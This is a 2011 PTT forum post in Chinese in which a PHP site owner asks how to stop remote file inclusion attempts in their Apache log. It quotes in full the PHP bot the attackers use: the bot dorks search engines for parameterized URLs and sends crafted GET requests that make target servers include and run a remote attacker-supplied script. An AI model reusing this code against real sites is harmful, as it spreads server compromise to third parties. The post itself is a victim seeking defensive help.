[請益] 網路攻擊?

看板PHP作者september02 (九月二號)時間14年前 (2011/06/15 20:59)推噓0(0推 0噓 7→)

留言7則, 3人參與討論串1/2 (看更多)

從昨天開始,APACHE的error_log就一直出現以下訊息,一秒一次左右 [Wed Jun 15 20:47:28 2011] [error] [client 187.127.72.193] PHP Notice: Use of undefined constant integer - assumed 'integer' in http://www.fpe.sn/webcam/pesquisadorRFI.txt?/config.php on line 190 http://www.fpe.sn 完全不是我的網址,我也不知道這是那裏 http://www.fpe.sn/webcam/pesquisadorRFI.txt的內容我看了如下 <?php function filterPhpInjection(&$links) { //filter the url until = $buffer = array(); foreach($links as $key => $value) { if(eregi("=",$value)) { preg_match('/[^=]+/',$value,$matches); $buffer[$key] = $matches[0] . "="; } } return $buffer; } function getLinks(&$buffer) { preg_match_all('/href="([^"> ]*)/',$buffer,$matches); foreach($matches[1] as $value) { if(eregi(".",$value) && !preg_match('/(google|orkut|live\.com|cade)/',$value)) { $matches_pure[] = $value; } } unset($matches); unset($buffer); foreach($matches_pure as $key => $value) { if(preg_match('/^\//',$value)) { unset($matches_pure[$key]); } elseif(preg_match('/^http/',$value) == 0 && preg_match('/^https/',$value) == 0) { $matches_pure[$key] = 'http://' . $value; } } $links = array(); foreach($matches_pure as $value) { preg_match('/https?:\/\/[^\/]*/',$value,$first_step); # get content in http://..../ $second_step = preg_split('/https?:\/\/[^\/]*/',$value); # get /.../..../..., the rest of url $host = preg_replace('/https?:\/\//','',$first_step[0]); $url = $second_step[1]; if(eregi("http://|www",$host)) { $links[$host] = $url; } else { unset($host,$url); } } unset($matches_pure); return $links; } function getGoogle($string,$pages=1,$adicional="") { $num = 100; # pega 100 resultados por pagina $start = 0; # inicia do resultado 0 $buffer = ""; do { $buffer .= @file_get_contents ("http://www.google.com.br/search?&q=" . urlencode("allinurl:$string$adicional") . "&num=$num&start=$start"); if($buffer == false) { break 1; } if(eregi("We're sorry...",$buffer)) { break 1; } if($pages > 1) { $start += 100; } sleep(5); } while(--$pages); return $buffer; } function getCade($string,$pages=1,$adicional="") { $num = 100; # pega 100 resultados por pagina $start = 1; # inicia do resultado 0 $end = 1; $buffer = ""; do { $buffer .= @file_get_contents ("http://cade.search.yahoo.com/search?&p=" . urlencode("inurl:$string$adicional") . "&n=$num&start=$start&b=$end"); if($buffer == false) { break 1; } if(eregi("erro 999",$buffer)) { break 1; } if($pages > 1) { $end += 100; } sleep(5); } while(--$pages); return $buffer; } function getLive($string,$pages=1,$adicional="") { $num = 11; # pega 11 resultados por pagina, na verdade são 10 $buffer =""; do { $buffer .= @file_get_contents ("http://search.live.com/results.aspx?q=" . urlencode("$string$adicional") . "&scope=&first=$num"); if($buffer == false) { break 1; } if($pages > 1) { $num += 10; } } while(--$pages); return $buffer; } function gerador() { $num = rand(1,6); $alfabeto = range('a','z'); $str = ''; while($num--) { $n = rand(0,25); $str .= $alfabeto[$n]; } $sites = array('ac','ad','ae','af','ag','ai','al','am','an','ao','aq','ar','as','at','au','aw','ax','az','ba','bb','bd','be','bf','bg','bh','bi','bj','bm','bn','bo','br','bs','bt','bv','bw','by','bz','ca','cc','cd','cf','cg','ch','ci','ck','cl','cm','cn','co','cr','cu','cv','cx','cy','cz','de','dj','dk','dm','do','dz','ec','ee','eg','eh','er','es','et','eu','fi','fj','fk','fm','fo','fr','ga','gb','gd','ge','gf','gg','gh','gi','gl','gm','gn','gp','gq','gr','gs','gt','gu','gw','gy','hk','hm','hn','hr','ht','hu','id' ,'ie','il','im','in','io','iq','ir','is','it','je','jm','jo','jp','ke','kg','kh','ki','km','kn','kp','kr','kw','ky','kz','la','lb','lc','li','lk','lr','lr','ls','lt','lu','lv','ly','ma','mc','md','me','mg','mh','mk','ml','mm','mn','mo','mp','mq','mr','ms','mt','mu','mv','mw','mx','my','mz','na','nc','ne','nf','ng','ni','nl','no','np','nr','nu','nz','nc.tr','om','pa','pe','pf','pg','ph','pk','pl','pm','pn','pr','ps','pt','pw','py','qa','re','ro','rs','ru','rw','sa','sb','sc','sd','se','sg','sh','si','sj',' sk','sl','sm','sn','so','sr','st','su','sv','sy','sz','tc','td','tf','tg','th','tj','tk','tl','tm','tn','to','tp','tr','tt','tv','tw','tz','ua','ug','uk','us','uy','uz','va','vc','ve','vg','vi','vn','vu','wf','ws','ye','yt','yu','za','zm','zw'); return '.php?' . $str . "= site:" . $sites[rand(0,250)]; //return ".php?$str="; } if(isset($_GET['para']) && isset($_GET['tempo']) && isset($_GET['checador']) && isset($_GET['enviador']) ): ignore_user_abort(false); set_time_limit(0); define("NEWLINE","<br />"); define("CHECADOR",$_GET['checador'] . '?servidor='); define("ENVIADOR",$_GET['enviador']); $para = $_GET['para']; //para o enviador $tempo = localtime(time(),true); $tempo2 = $tempo['tm_min'] + $_GET['tempo']; while($tempo['tm_min'] < $tempo2) { $value = gerador(); if(isset($_GET['addGoogle'])) $buffer = getGoogle($value,2,' ' . $_GET['addGoogle']); else $buffer = getGoogle($value,2); if(isset($_GET['addCade'])) $buffer .= getCade($value,2,' ' . $_GET['addCade']); else $buffer .= getCade($value); if(isset($_GET['addLive'])) $buffer .= getLive($value,10,' ' .$_GET['addLive']); else $buffer .= getLive($value,10); $buffer = getLinks($buffer); $buffer = filterPhpInjection($buffer); foreach($buffer as $chave => $valor) { if(eregi("http://",$chave)) $chave = str_replace("http://", "", $chave); if(!eregi("www.",$chave)) $chave = "www." . $chave; $checa = @file_get_contents(CHECADOR . $chave); if(eregi("verdade",$checa)) continue 1; $url = $chave . $valor; $inc = ENVIADOR; $get = $valor . $inc . "?&servidor=$url&para=$para"; $header = "GET $get HTTP/1.1 \r\n"; $header .= "Host: $chave \r\n\r\n"; $sk = @socket_create(AF_INET,SOCK_STREAM,SOL_TCP); $conn = @socket_connect($sk, $chave, 80); @socket_write($sk,$header,strlen($header)); if(gettype($tempo['tm_min']/20) == integer) { mail($para,"máquina $chave pesquisando..."); } } $tempo = localtime(time(),true); } endif; ?> 請問我要怎麼阻止這個訊息一直出現T-T 求求大家幫幫忙 -- 女人會愛上讓她哭的男人,卻嫁給讓她笑的男人男人會愛上讓他笑的女人,卻娶了讓他哭的女人 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 218.167.187.241